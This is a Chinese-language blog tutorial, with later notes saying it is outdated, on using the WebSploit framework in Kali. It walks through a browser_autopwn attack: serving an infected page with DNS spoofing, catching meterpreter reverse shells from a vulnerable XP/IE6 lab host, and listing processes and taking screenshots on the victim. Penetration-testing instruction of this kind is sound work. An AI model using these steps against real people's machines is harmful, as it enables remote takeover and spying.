2014年12月17日 星期三

針對Web系統的滲透測試框架 -- WebSploit

20150916加註: exploit/browser_autopwn 在 Kali 2.0 中已經失效。
20190623加註: 因metasploit改變策略,已不再提供msfcli使用界面,而websploit自2014年以來亦未更版,目前websploit無法和metasploit整合使用,凡是使用到metasploit模組的部分都已失效。

做滲透測試的人對 metasploit 應該不陌生,這是一套滲透大全工具,而 WebSploit 則是仿 metasploit 開發、針對Web系統的滲透框架,操作程序也跟metasploit 相同,可以把 WebSploit 看做 metasploit 的子集。
在 Kali 裡,可以從 「Web程序 \ Web應用漏洞挖掘 \ websploit」 進入或直接於終端機執行 websploit,進入後可利用 show modules 查看目前提供的模組有哪些,目前模組主要分成:
Web 類:進行網站的資訊收集
Network 類:針對網路通訊的攻擊,如 spoofing、DoS
Exploit 類:針對瀏覽器或作業系統漏洞編製惡意網站(需搭配社交工程)
Wireless/Bluetooth類:針對無線網路或藍芽的攻擊模組
websploit 的使用程序也跟 metasploit 一樣:
use 模組
set OPTION VALUE
run
以 Exploit 模組中的 exploit/browser_autopwn 為例,操作如下:
wsf > use exploit/browser_autopwn
wsf:Browser_Autopwn > show options

Options   Value    RQ  Description
--------- --------------  ---- --------------
Interface eth0   yes Network Interface Name
LHOST  192.168.1.1  yes Local IP Address

wsf:Browser_Autopwn > set LHOST 192.168.158.135
INTERFACE =>  192.168.158.135
wsf:Browser_Autopwn > run                         執行模組
[*]Starting WebServer ... Please Wait ...
[*]Configuration DNS Spoof ... 
[*]Creating Infected Page For Victim ...
[*]Engine Has Been Started.
[*] Initializing modules...                       會自動載入 metasploit
LHOST => 192.168.158.135
URIPATH => index
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2014-12-17 09:12:56 +0800

中間過程是 websploit 透過 metasploit 載入漏洞利用模組

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/index
[*]  Local IP: http://192.168.158.135:8080/index
[*] Server started.

如果有使用者不幸中計,開啟瀏覽器上網或瀏覽上面的網址,而且瀏覽器存在漏洞(IE6)
就會反彈回我們的 metasploit,利用 show sessions 就可以看到幾組成功

show sessions

Active sessions
===============
總共有5組滲透成功
  Id  Type                   Information        Connection
  --  ----                   -----------        ----------
  1   meterpreter java/java  usertest @ XP_ORG  192.168.158.135:7777 -> 192.168.158.136:1044 (192.168.158.136)
  2   meterpreter java/java  usertest @ XP_ORG  192.168.158.135:7777 -> 192.168.158.136:1046 (192.168.158.136)
  3   meterpreter java/java  usertest @ XP_ORG  192.168.158.135:7777 -> 192.168.158.136:1054 (192.168.158.136)
  4   meterpreter java/java  usertest @ XP_ORG  192.168.158.135:7777 -> 192.168.158.136:1055 (192.168.158.136)
  5   meterpreter java/java  usertest @ XP_ORG  192.168.158.135:7777 -> 192.168.158.136:1056 (192.168.158.136)

msf auxiliary(browser_autopwn) > sessions -i 1            把第1組移到前景
[*] Starting interaction with 1...

meterpreter > ps                   拿到了遠端機器的控制權

Process List
============

 PID   Name                 Arch  User                          Path
 ---   ----                 ----  ----                          ----
 0     System Idle Process        NT AUTHORITY\System           System Idle Process
 4     System                     NT AUTHORITY\SYSTEM           System
 368   smss.exe                   NT AUTHORITY\SYSTEM           smss.exe
 492   alg.exe                    NT AUTHORITY\LOCAL SERVICE    alg.exe
 (下以略)

meterpreter > screenshot


在 meterpreter 下利用 screenshot 擷取受駭主機的螢幕畫面,證實滲透成功!

websploit 將 metasploit 的滲透步驟做包裝,讓我們執行滲透測試時不用執行許多步驟。

沒有留言:

張貼留言